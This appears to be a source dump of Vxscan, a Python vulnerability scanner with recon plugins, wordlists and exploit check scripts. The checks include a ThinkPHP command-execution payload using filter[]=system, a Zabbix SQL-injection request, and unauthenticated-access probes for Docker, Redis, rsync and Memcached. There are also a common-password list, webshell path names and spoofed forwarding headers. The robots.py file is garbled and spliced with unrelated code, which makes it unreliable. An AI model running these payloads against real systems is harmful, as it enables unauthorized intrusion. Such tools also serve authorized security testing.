├── doc ├── logo.jpg ├── logo1.jpg └── logo2.jpg ├── data ├── GeoLite2-ASN.mmdb ├── path │ ├── txt.txt │ ├── dir.txt │ ├── jsp.txt │ ├── asp.txt │ ├── other.txt │ └── php.txt └── password.txt ├── report ├── fonts │ ├── element-icons.ttf │ └── element-icons.woff ├── en.js └── report.htm ├── .gitattributes ├── requirements.txt ├── lib ├── bcolors.py ├── random_header.py ├── common.py ├── web_info.py ├── settings.py ├── cli_output.py ├── vuln.py ├── options.py ├── url.py ├── Requests.py ├── verify.py ├── waf.py ├── sqldb.py └── iscdn.py ├── script ├── ftp_anonymous.py ├── django_urljump.py ├── pulse_cve_2019_11510.py ├── zookeeper_unauthorized_access.py ├── thinkphp5_rce_1.py ├── mongodb_unauthorized_access.py ├── redis_unauthorized_access.py ├── memcached_unauthorized_access.py ├── docker_unauthorized_access.py ├── jboss_jmx_console.py ├── http_put.py ├── thinkphp_5_0_23_rce.py ├── solr_unauthorized_access.py ├── phpinfo.py ├── rsync_unauthorized_access.py ├── fingerprint.py ├── get_title.py ├── zabbix_jsrpc_sqli.py ├── leaks.py ├── find_admin.py ├── solr_rce_via_velocity.py ├── Weblogic_CVE_2017_10271_RCE.py └── apache_struts_all.py ├── plugins ├── ActiveReconnaissance │ ├── robots.py │ ├── osdetect.py │ ├── check_waf.py │ ├── active.py │ └── crawl.py ├── PassiveReconnaissance │ ├── ip_history.py │ ├── virustotal.py │ ├── reverse_domain.py │ └── wappalyzer.py ├── InformationGathering │ ├── geoip.py │ └── js_leaks.py └── Scanning │ ├── dir_scan.py │ └── async_scan.py ├── Vxscan.py ├── .gitignore ├── .travis.yml ├── analyzer.py ├── README.zh-CN.md ├── LICENSE └── report.py /doc/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/doc/logo.jpg -------------------------------------------------------------------------------- /doc/logo1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/doc/logo1.jpg -------------------------------------------------------------------------------- /doc/logo2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/doc/logo2.jpg -------------------------------------------------------------------------------- /data/GeoLite2-ASN.mmdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/data/GeoLite2-ASN.mmdb -------------------------------------------------------------------------------- /report/fonts/element-icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/report/fonts/element-icons.ttf -------------------------------------------------------------------------------- /report/fonts/element-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/al0ne/Vxscan/HEAD/report/fonts/element-icons.woff -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | *.js linguist-language=python; 2 | *.css linguist-language=python; 3 | *.html linguist-language=python 4 | -------------------------------------------------------------------------------- /data/path/txt.txt: -------------------------------------------------------------------------------- 1 | /robots.txt 2 | /test2.txt 3 | /debug.txt 4 | /changelog.txt 5 | /readMe.txt 6 | /auth.txt 7 | /用户说明.txt 8 | /安装手册.txt 9 | /ftp.txt 10 | /ver.txt 11 | /install.txt 12 | /output.txt -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pyfiglet 3 | fake-useragent 4 | beautifulsoup4 5 | geoip2 6 | python-nmap 7 | tldextract 8 | lxml 9 | pymongo 10 | virustotal_python 11 | dnspython 12 | pysocks 13 | asyncio 14 | aiohttp 15 | chardet 16 | uvloop 17 | urllib3 18 | pyOpenSSL -------------------------------------------------------------------------------- /lib/bcolors.py: -------------------------------------------------------------------------------- 1 | class Bcolors: 2 | HEADER = '\033[95m' 3 | OKBLUE = '\033[94m' 4 | OKGREEN = '\033[92m' 5 | WARNING = '\033[93m' 6 | FAIL = '\033[91m' 7 | RED = '\033[31m' 8 | ENDC = '\033[0m' 9 | BOLD = '\033[1m' 10 | UNDERLINE = '\033[4m' 11 | -------------------------------------------------------------------------------- /script/ftp_anonymous.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import ftplib 3 | 4 | from lib.verify import verify 5 | 6 | vuln = ['FTP', '21'] 7 | 8 | 9 | def check(url, ip, ports, apps): 10 | if verify(vuln, ports, apps): 11 | try: 12 | ftp = ftplib.FTP(ip) 13 | ftp.login('anonymous', 'anonymous') 14 | return 'FTP anonymous Login' 15 | except Exception as e: 16 | pass 17 | -------------------------------------------------------------------------------- /script/django_urljump.py: -------------------------------------------------------------------------------- 1 | from lib.Requests import Requests 2 | from lib.verify import verify 3 | 4 | vuln = ['Django'] 5 | 6 | 7 | def check(url, ip, ports, apps): 8 | req = Requests() 9 | if verify(vuln, ports, apps): 10 | payload = "//www.example.com" 11 | try: 12 | r = req.get(url + payload) 13 | if r.is_redirect and 'www.example.com' in r.headers.get('Location'): 14 | return 'Django < 2.0.8 任意URL跳转漏洞' 15 | except Exception as e: 16 | pass 17 | -------------------------------------------------------------------------------- /plugins/ActiveReconnaissance/robots.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import logging 3 | import re 4 | 5 | from lib.Requests import Requests 6 | 7 | 8 | def robots(url): 9 | result = '' 10 | try: 11 | req = Requests() 12 | r = req.get(url + '/robots.txt') 13 | if r.status_code == 200 and ')\d+\.\d+\.\d+\.\d+(?=)', r.text, re.S | re.I) 15 | if result: 16 | for i in result: 17 | if iscdn(i): 18 | out.append(i) 19 | except Exception: 20 | pass 21 | 22 | return out 23 | -------------------------------------------------------------------------------- /data/path/dir.txt: -------------------------------------------------------------------------------- 1 | /login/ 2 | /pma/ 3 | /pmd/ 4 | /admin/ 5 | /Admin/ 6 | /manager/ 7 | /solr/ 8 | /examples/ 9 | /cacti/ 10 | /ckeditor/samples/ 11 | /WEB-INF/classes/ 12 | /WEB-INF/lib/ 13 | /WEB-INF/src/ 14 | /zabbix/ 15 | /editor/ckeditor/samples/ 16 | /resin-admin/ 17 | /ganglia/ 18 | /server-info/ 19 | /xampp/ 20 | /nginx_status 21 | /phpMyAdmin 22 | /SiteServer 23 | /manage/ 24 | /system/ 25 | /uc_server 26 | /debug 27 | /Conf 28 | /webmail 29 | /service 30 | /memadmin 31 | /owa 32 | /harbor 33 | /master 34 | /root 35 | /zabbix 36 | /api 37 | /backup 38 | /inc 39 | /id_rsa 40 | /script 41 | /id_dsa 42 | /readme 43 | /key 44 | /configprops 45 | /keys 46 | /exit 47 | /core 48 | /Templates 49 | /ews 50 | /nagios 51 | /adminmanager 52 | /manager -------------------------------------------------------------------------------- /script/memcached_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | from lib.verify import verify 4 | 5 | vuln = ['Memcached', '11211'] 6 | 7 | 8 | def check(url, ip, ports, apps): 9 | if verify(vuln, ports, apps): 10 | socket.setdefaulttimeout(2) 11 | port = 11211 12 | payload = b'\x73\x74\x61\x74\x73\x0a' # command:stats 13 | s = socket.socket() 14 | socket.setdefaulttimeout(5) 15 | try: 16 | s.connect((ip, port)) 17 | s.send(payload) 18 | recvdata = s.recv(2048) # response larger than 1024 19 | s.close() 20 | if recvdata and (b'STAT version' in recvdata): 21 | return '11211 Memcache Unauthorized Access' 22 | except Exception as e: 23 | print(e) 24 | -------------------------------------------------------------------------------- /script/docker_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | from lib.verify import verify 4 | 5 | vuln = ['docker', '2375'] 6 | 7 | 8 | def check(url, ip, ports, apps): 9 | socket.setdefaulttimeout(2) 10 | if verify(vuln, ports, apps): 11 | try: 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | s.connect((ip, 2375)) 14 | payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (ip, 2375) 15 | s.send(payload.encode()) 16 | recv = s.recv(1024) 17 | if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv: 18 | return '2375 Docker unauthorized success' 19 | except Exception as e: 20 | # return '2375 Docker Failed' 21 | pass 22 | -------------------------------------------------------------------------------- /script/jboss_jmx_console.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | from lib.Requests import Requests 8 | from lib.verify import get_list 9 | 10 | req = Requests() 11 | 12 | 13 | def get_title(url): 14 | try: 15 | payload = '/jmx-console/' 16 | r = req.get(url + payload) 17 | if "jboss" in r.text: 18 | return 'Jboss console/ page: ' + url + payload 19 | except Exception: 20 | pass 21 | 22 | 23 | def check(url, ip, ports, apps): 24 | result = [] 25 | probe = get_list(url, ports) 26 | for i in probe: 27 | if re.search(r':\d+', i): 28 | out = get_title(i) 29 | if out: 30 | result.append(out) 31 | if result: 32 | return result 33 | -------------------------------------------------------------------------------- /Vxscan.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | # author: al0ne 4 | # https://github.com/al0ne 5 | 6 | import logging 7 | import os 8 | import sys 9 | 10 | from lib.cli_output import banner 11 | from lib.options import options 12 | 13 | if os.path.exists('error.log'): 14 | os.remove('error.log') 15 | 16 | if sys.version_info.major < 3 or sys.version_info.minor < 6: 17 | sys.stdout.write("Sorry, Vxscan requires Python 3.6/3.7/3.8 \n") 18 | sys.exit(1) 19 | 20 | 21 | if __name__ == "__main__": 22 | 23 | logging.basicConfig(filename='error.log', level=logging.ERROR) 24 | logging.getLogger() 25 | 26 | try: 27 | banner() 28 | options() 29 | except KeyboardInterrupt: 30 | print('\nCtrl+C Stop running\n') 31 | sys.exit(0) 32 | except Exception as e: 33 | logging.exception(e) 34 | -------------------------------------------------------------------------------- /script/http_put.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | from lib.random_header import get_ua 4 | from lib.verify import get_list 5 | 6 | 7 | def put(url): 8 | url = url.strip('/') 9 | text = random.randint(100000000, 200000000) 10 | payload = '/{}.txt'.format(text) 11 | url = url + payload 12 | data = {'{}'.format(text): '{}'.format(text)} 13 | r = requests.put(url, data=data, allow_redirects=False, verify=False, headers=get_ua()) 14 | if r.status_code == 201: 15 | return 'HTTP METHOD PUT url: {}'.format(url) 16 | 17 | 18 | def check(url, ip, ports, apps): 19 | result = '' 20 | try: 21 | probe = get_list(ip, ports) 22 | for url in probe: 23 | result = put(url) 24 | except Exception as e: 25 | pass 26 | if result: 27 | return result 28 | -------------------------------------------------------------------------------- /script/thinkphp_5_0_23_rce.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import random 3 | 4 | from lib.Requests import Requests 5 | from lib.verify import verify 6 | 7 | vuln = ['ThinkPHP', 'ThinkSNS'] 8 | random_num = ''.join(str(i) for i in random.sample(range(0, 9), 8)) 9 | 10 | 11 | def check(url, ip, ports, apps): 12 | req = Requests() 13 | if verify(vuln, ports, apps): 14 | payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num) 15 | try: 16 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 17 | r = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers) 18 | if random_num in r.text: 19 | return 'thinkphp_5_0_23_rce | ' + url 20 | except Exception as e: 21 | pass 22 | -------------------------------------------------------------------------------- /script/solr_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | from lib.Requests import Requests 4 | from lib.verify import get_list 5 | 6 | 7 | def get_info(url): 8 | try: 9 | req = Requests() 10 | url = url + '/solr/' 11 | r = req.get(url) 12 | if r.status_code is 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text: 13 | return 'Apache Solr Admin leask: ' + url 14 | except Exception: 15 | pass 16 | 17 | 18 | def check(url, ip, ports, apps): 19 | result = [] 20 | try: 21 | probe = get_list(url, ports) 22 | for i in probe: 23 | if re.search(r':\d+', i): 24 | out = get_info(i) 25 | if out: 26 | result.append(out) 27 | if result: 28 | return result 29 | except Exception: 30 | pass 31 | -------------------------------------------------------------------------------- /script/phpinfo.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | from lib.Requests import Requests 8 | from lib.verify import get_list 9 | 10 | path = ['/1.php', '/p.php', '/phpinfo.php', '/info.php', '/i.php', '/test.php', '/a.php', '/?phpinfo=1', '/111.php'] 11 | 12 | 13 | def get_info(url): 14 | try: 15 | req = Requests() 16 | for i in path: 17 | r = req.get(url + i) 18 | if r.status_code == 200: 19 | if 'phpinfo()' in r.text or 'php_version' in r.text: 20 | return 'phpinfo leaks: ' + url + i 21 | except: 22 | pass 23 | 24 | 25 | def check(url, ip, ports, apps): 26 | result = [] 27 | probe = get_list(url, ports) 28 | for i in probe: 29 | if re.search(r':\d+', i): 30 | out = get_info(i) 31 | if out: 32 | result.append(out) 33 | if result: 34 | return result 35 | -------------------------------------------------------------------------------- /script/rsync_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | from lib.verify import verify 4 | 5 | timeout = 3 6 | 7 | vuln = ['rsync', '873'] 8 | 9 | 10 | def check(url, ip, ports, apps): 11 | if verify(vuln, ports, apps): 12 | try: 13 | socket.setdefaulttimeout(1.5) 14 | payload = b"\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a" 15 | socket.setdefaulttimeout(timeout) 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | server_address = (ip, 873) 18 | sock.connect(server_address) 19 | sock.sendall(payload) 20 | initinfo = sock.recv(400) 21 | if b"RSYNCD" in initinfo: 22 | sock.sendall(b"\x0a") 23 | modulelist = sock.recv(200) 24 | sock.close() 25 | if len(modulelist) > 0: 26 | return '873 Rsync Unauthorized Access' 27 | except Exception as e: 28 | pass 29 | -------------------------------------------------------------------------------- /lib/random_header.py: -------------------------------------------------------------------------------- 1 | # author: al0ne 2 | # https://github.com/al0ne 3 | 4 | import random 5 | import socket 6 | import string 7 | import struct 8 | 9 | from fake_useragent import UserAgent 10 | 11 | HEADERS = { 12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 13 | 'User-Agent': "", 14 | 'Referer': "", 15 | 'X-Forwarded-For': "", 16 | 'X-Real-IP': "", 17 | 'Connection': 'keep-alive', 18 | } 19 | 20 | 21 | def get_ua(): 22 | ua = UserAgent() 23 | key = random.random() * 20 24 | referer = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(int(key))]) 25 | referer = 'www.' + referer.lower() + '.com' 26 | ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) 27 | HEADERS["User-Agent"] = ua.random 28 | HEADERS["Referer"] = referer 29 | HEADERS["X-Forwarded-For"] = HEADERS["X-Real-IP"] = ip 30 | 31 | return HEADERS 32 | 33 | 34 | if __name__ == "__main__": 35 | print(get_ua()) 36 | -------------------------------------------------------------------------------- /plugins/ActiveReconnaissance/osdetect.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import logging 6 | import xml 7 | 8 | import nmap 9 | 10 | from lib.cli_output import console 11 | 12 | 13 | def osdetect(ip): 14 | # sys.stdout.write(Bcolors.RED + "\nOS:\n" + Bcolors.ENDC) 15 | nm = nmap.PortScanner() 16 | try: 17 | result = nm.scan(hosts=ip, arguments='-sS -O -vv -n -T4 -p 80,22,443') 18 | for k, v in result.get('scan').items(): 19 | if v.get('osmatch'): 20 | for i in v.get('osmatch'): 21 | console('OSdetect', ip, i.get('name') + '\n') 22 | return i.get('name') 23 | else: 24 | break 25 | except (xml.etree.ElementTree.ParseError, nmap.nmap.PortScannerError): 26 | pass 27 | except Exception as e: 28 | console('OSdetect', ip, 'None\n') 29 | logging.exception(e) 30 | 31 | 32 | if __name__ == "__main__": 33 | os = osdetect('127.0.0.1') 34 | -------------------------------------------------------------------------------- /script/fingerprint.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | import chardet 8 | 9 | from lib.Requests import Requests 10 | from lib.verify import get_list 11 | from plugins.PassiveReconnaissance.wappalyzer import WebPage 12 | 13 | req = Requests() 14 | 15 | 16 | def get_title(url): 17 | try: 18 | r = req.get(url) 19 | coding = chardet.detect(r.content).get('encoding') 20 | text = r.content[:10000].decode(coding) 21 | webinfo = WebPage(r.url, text, r.headers).info() 22 | if webinfo.get('apps'): 23 | return 'URL: ' + url + ' | Fingerprint: ' + ' , '.join(webinfo.get('apps')) 24 | except: 25 | pass 26 | 27 | 28 | def check(url, ip, ports, apps): 29 | result = [] 30 | probe = get_list(url, ports) 31 | for i in probe: 32 | if re.search(r':\d+', i): 33 | out = get_title(i) 34 | if out: 35 | result.append(out) 36 | if result: 37 | return result 38 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | test.py 6 | 7 | # C extensions 8 | *.so 9 | .vscode/ 10 | # Distribution / packaging 11 | .Python 12 | env/ 13 | build/ 14 | develop-eggs/ 15 | dist/ 16 | downloads/ 17 | eggs/ 18 | .eggs/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | .idea/ 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *,cover 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | 55 | # Sphinx documentation 56 | docs/_build/ 57 | 58 | # PyBuilder 59 | target/ 60 | *.html 61 | Vxscan.zip 62 | db/GeoLite2-City.mmdb 63 | 64 | *.json -------------------------------------------------------------------------------- /data/path/jsp.txt: -------------------------------------------------------------------------------- 1 | /SearchPublicRegistries.jsp 2 | /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp 3 | /jsp.jsp 4 | /wcm/app/login.jsp 5 | /console/login/LoginForm.jsp 6 | /vaf.jsp 7 | /158.jsp 8 | /123.jsp 9 | /111.jsp 10 | /shangji.jsp 11 | /text.jsp 12 | /fang.jsp 13 | /aurrs.jsp 14 | /k.jsp 15 | /ziyoubi.jsp 16 | /lcyx.jsp 17 | /weijishi.jsp 18 | /1.jsp 19 | /jumbo.jsp 20 | /test.jsp 21 | /1111.jsp 22 | /bak.jsp 23 | /is.test.jsp 24 | /a.jsp 25 | /tunnel.jsp 26 | /3.jsp 27 | /cqtest.jsp 28 | /zzzz.jsp 29 | /Jspspyweb.jsp 30 | /welcome.jsp 31 | /403.jsp 32 | /ma.jsp 33 | /index.jsp 34 | /kid.jsp 35 | /tt2.jsp 36 | /fuckfuck.jsp 37 | /index.jsp 38 | /job.jsp 39 | /c.jsp 40 | /conifgs.jsp 41 | /2.jsp 42 | /b001.jsp 43 | /jspspy.jsp 44 | /panel.jsp 45 | /dynamicattrs.jsp 46 | /hello.jsp 47 | /login.jsp 48 | /GSDLYT.jsp 49 | /bss.jsp 50 | /ck_gz.jsp 51 | /examples.jsp 52 | /include.jsp 53 | /lele.jsp 54 | /plugin.jsp 55 | /wlscmd.jsp 56 | /zzxas.jsp 57 | /loginUser.action 58 | /login.action 59 | /login.do 60 | /upload.do 61 | /admin.do 62 | /SearchServlet.do 63 | /autoFormController.do 64 | /bindUser.do 65 | /ddcx.do -------------------------------------------------------------------------------- /script/get_title.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | import chardet 8 | from lxml import etree 9 | 10 | from lib.Requests import Requests 11 | from lib.verify import get_list 12 | 13 | req = Requests() 14 | 15 | 16 | def get_title(url): 17 | code = 0 18 | 19 | try: 20 | r = req.get(url) 21 | code = r.status_code 22 | coding = chardet.detect(r.content).get('encoding') 23 | text = r.content[:10000].decode(coding) 24 | html = etree.HTML(text) 25 | title = html.xpath('//title/text()') 26 | if title: 27 | return url + ' | ' + title[0] 28 | else: 29 | return url + ' | Status_code: ' + str(code) 30 | except: 31 | pass 32 | 33 | return url + ' | Status_code: ' + str(code) 34 | 35 | 36 | def check(url, ip, ports, apps): 37 | result = [] 38 | probe = get_list(url, ports) 39 | for i in probe: 40 | if re.search(r':\d+', i): 41 | out = get_title(i) 42 | if out: 43 | result.append(out) 44 | if result: 45 | return result 46 | -------------------------------------------------------------------------------- /script/zabbix_jsrpc_sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | """ 6 | ZABBIX jsrpc.php 参数profileIdx2 insert SQL注入漏洞 7 | 8 | zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞, 在开启guest的情况下,攻击者无需授权登陆即可登陆zabbix管理系统, 也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 9 | 10 | Usage: 11 | python POC-T.py -s zabbix-jsrpc-sqli -aZ "zabbix country:us" 12 | 13 | Version 14 | v2.2.x, 3.0.0-3.0.3 15 | 16 | """ 17 | from lib.Requests import Requests 18 | from lib.verify import verify 19 | 20 | vuln = ['zabbix'] 21 | 22 | 23 | def check(url, ip, ports, apps): 24 | req = Requests() 25 | if verify(vuln, ports, apps): 26 | payload = r"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17" 27 | try: 28 | r = req.get(url + payload) 29 | if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text): 30 | return 'CVE-2016-10134 zabbix sqli:' + url 31 | except Exception as e: 32 | pass 33 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | script: true 3 | 4 | matrix: 5 | include: 6 | - name: "Python 3.6 on Linux" 7 | python: 3.6 # this works for Linux but is ignored on macOS or Windows 8 | - name: "Python 3.7 on Xenial Linux" 9 | python: 3.7 # this works for Linux but is ignored on macOS or Windows 10 | dist: xenial # required for Python >= 3.7 11 | - name: "Python 3.8 on Xenial Linux" 12 | python: 3.8-dev # this works for Linux but is ignored on macOS or Windows 13 | dist: xenial # required for Python >= 3.7 14 | - name: "Python 3.7 on macOS" 15 | os: osx 16 | osx_image: xcode10.2 # Python 3.7 running on macOS 10.14.3 17 | language: shell # 'language: python' is an error on Travis CI macOS 18 | - name: "Python 3.7 on Windows" 19 | os: windows # Windows 10.0.17134 N/A Build 17134 20 | language: shell 21 | before_install: 22 | - choco install python 23 | - python -m pip install --upgrade pip 24 | env: PATH=/c/Python37:/c/Python37/Scripts:$PATH 25 | 26 | install: 27 | - pip3 install -U pip 28 | - pip3 install codecov 29 | - pip3 install -r requirements.txt 30 | -------------------------------------------------------------------------------- /plugins/InformationGathering/geoip.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import logging 6 | 7 | import geoip2.database 8 | import geoip2.errors 9 | 10 | from lib.cli_output import console 11 | 12 | 13 | def geoip(ipaddr): 14 | # 获取IP地理位置 15 | try: 16 | reader = geoip2.database.Reader('data/GeoLite2-City.mmdb') 17 | response = reader.city(ipaddr) 18 | country = response.country.names["zh-CN"] 19 | site = response.subdivisions.most_specific.names.get("zh-CN") 20 | if not site: 21 | site = '' 22 | city = response.city.names.get("zh-CN") 23 | if not city: 24 | city = '' 25 | address = '{} {} {}'.format(country, site, city) 26 | except FileNotFoundError: 27 | address = 'Geoip File Not Found' 28 | except (KeyError, geoip2.errors.AddressNotFoundError): 29 | address = 'Address Not In Databases' 30 | except Exception as e: 31 | logging.exception(e) 32 | address = 'None' 33 | console('GeoIP', ipaddr, 'Address: {}\n'.format(address)) 34 | console('GeoIP', ipaddr, 'Ipaddr: {}\n'.format(ipaddr)) 35 | return address 36 | 37 | 38 | if __name__ == "__main__": 39 | geoip('1.1.1.1') 40 | -------------------------------------------------------------------------------- /plugins/PassiveReconnaissance/virustotal.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import re 3 | 4 | from virustotal_python import Virustotal 5 | 6 | from lib.cli_output import console 7 | from lib.iscdn import iscdn 8 | from lib.settings import VIRUSTOTAL_API 9 | from plugins.PassiveReconnaissance.ip_history import ipinfo 10 | 11 | 12 | def virustotal(host): 13 | # VT接口,主要用来查询PDNS,绕过CDN 14 | pdns = [] 15 | history_ip = [] 16 | if VIRUSTOTAL_API: 17 | # noinspection PyBroadException 18 | try: 19 | vtotal = Virustotal(VIRUSTOTAL_API) 20 | if re.search(r'\d+\.\d+\.\d+\.\d+', host): 21 | return None 22 | resp = vtotal.domain_report(host) 23 | if resp.get('status_code') != 403: 24 | for i in resp.get('json_resp').get('resolutions'): 25 | address = i.get('ip_address') 26 | timeout = i.get('last_resolved') 27 | if iscdn(address): 28 | history_ip.append(address + ' : ' + timeout) 29 | pdns = history_ip[10:] 30 | except Exception: 31 | pass 32 | 33 | pdns.extend(ipinfo(host)) 34 | 35 | if pdns: 36 | for i in pdns[:10]: 37 | console('PDNS', host, i + '\n') 38 | else: 39 | console('PDNS', host, 'None\n') 40 | return pdns 41 | -------------------------------------------------------------------------------- /script/leaks.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | from lib.Requests import Requests 7 | from lib.verify import get_list 8 | from lib.settings import PAGE_404 9 | 10 | path = [ 11 | '/.git/config', '/.svn/entries', '/.git/index', '/.git/HEAD', '/.ssh/known_hosts', '/.DS_Store', '/.hg', 12 | '/WEB-INF/web.xml', '/WEB-INF/database.properties', '/CVS/Entries', '/_cat/' 13 | ] 14 | 15 | 16 | def verify(text): 17 | result = True 18 | for i in PAGE_404: 19 | if i in text: 20 | result = False 21 | break 22 | return result 23 | 24 | 25 | def get_info(url): 26 | try: 27 | req = Requests() 28 | for i in path: 29 | r = req.get(url + i) 30 | if r.status_code == 200 and '<html' not in r.text: 31 | if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text): 32 | if verify(r.text): 33 | return 'leaks : ' + url + i 34 | except: 35 | pass 36 | 37 | 38 | def check(url, ip, ports, apps): 39 | result = [] 40 | probe = get_list(url, ports) 41 | for i in probe: 42 | if re.search(r':\d+', i): 43 | out = get_info(i) 44 | if out: 45 | result.append(out) 46 | if result: 47 | return result 48 | -------------------------------------------------------------------------------- /data/password.txt: -------------------------------------------------------------------------------- 1 | 123456789 2 | password 3 | passwd 4 | a123456 5 | pass 6 | user 7 | root 8 | 123456 9 | a123456789 10 | 1234567890 11 | qq123456 12 | abc123456 13 | 123456a 14 | Oracle@123 15 | 123456789a 16 | admin. 17 | 147258369 18 | zxcvbnm 19 | admin 20 | zkeys 21 | admin888 22 | zebra 23 | admin999 24 | 987654321 25 | 12345 26 | conexant 27 | adsl1234 28 | 12345678910 29 | abc123 30 | qq123456789 31 | 123456789. 32 | 666666 33 | 88888888 34 | 7708801314520 35 | 5201314520 36 | q123456 37 | 123456abc 38 | 1233211234567 39 | 123123123 40 | 123456. 41 | 0123456789 42 | asd123456 43 | aa123456 44 | 135792468 45 | q123456789 46 | abcd123456 47 | 12345678900 48 | zxcvbnm123 49 | w123456 50 | abc123456789 51 | 111111 52 | qwertyuiop 53 | 1314520520 54 | 1234567891 55 | qwe123456 56 | dorado 57 | manager 58 | adminer 59 | firewall 60 | telnetpwd 61 | shell 62 | asd123 63 | 000000 64 | 1472583690 65 | 1357924680 66 | 1q2w3e4r 67 | 789456123 68 | 123456789abc 69 | z123456 70 | 1234567899 71 | aaa123456 72 | abcd1234 73 | www123456 74 | 123456789q 75 | 123abc 76 | qwe123 77 | w123456789 78 | 7894561230 79 | 123456qq 80 | zxc123456 81 | 123456789qq 82 | 1111111111 83 | admin123 84 | default 85 | Admin123 86 | 111111111 87 | 12344321 88 | qazwsxedc 89 | qwerty 90 | 123456.. 91 | zxc123 92 | system 93 | guest 94 | asdfghjkl 95 | security 96 | administrator 97 | 0000000000 98 | 1234554321 99 | 123456q 100 | 123456aa -------------------------------------------------------------------------------- /lib/common.py: -------------------------------------------------------------------------------- 1 | # author: al0ne 2 | # https://github.com/al0ne 3 | 4 | import re 5 | 6 | from lib.iscdn import iscdn 7 | from lib.settings import SCANDIR, CRAWL 8 | from lib.sqldb import Sqldb 9 | from lib.url import parse_ip 10 | from lib.verify import verify_https 11 | from lib.vuln import Vuln 12 | from lib.web_info import web_info 13 | from plugins.ActiveReconnaissance.crawl import Crawl 14 | from plugins.Scanning.async_scan import DirScan 15 | from plugins.Scanning.port_scan import ScanPort 16 | 17 | 18 | def web_save(webinfo, dbname): 19 | Sqldb(dbname).get_webinfo(webinfo) 20 | 21 | 22 | def start(target, dbname='result'): 23 | if dbname != 'result': 24 | dbname = re.sub(r'.db', '', dbname) 25 | title = 'test' 26 | host = parse_ip(target) 27 | url = verify_https(target) 28 | if url: 29 | isopen = True 30 | else: 31 | isopen = False 32 | if isopen: 33 | data, apps, title = web_info(url) 34 | else: 35 | data = '' 36 | apps = {} 37 | if iscdn(host): 38 | open_port = ScanPort(url, dbname).pool() 39 | 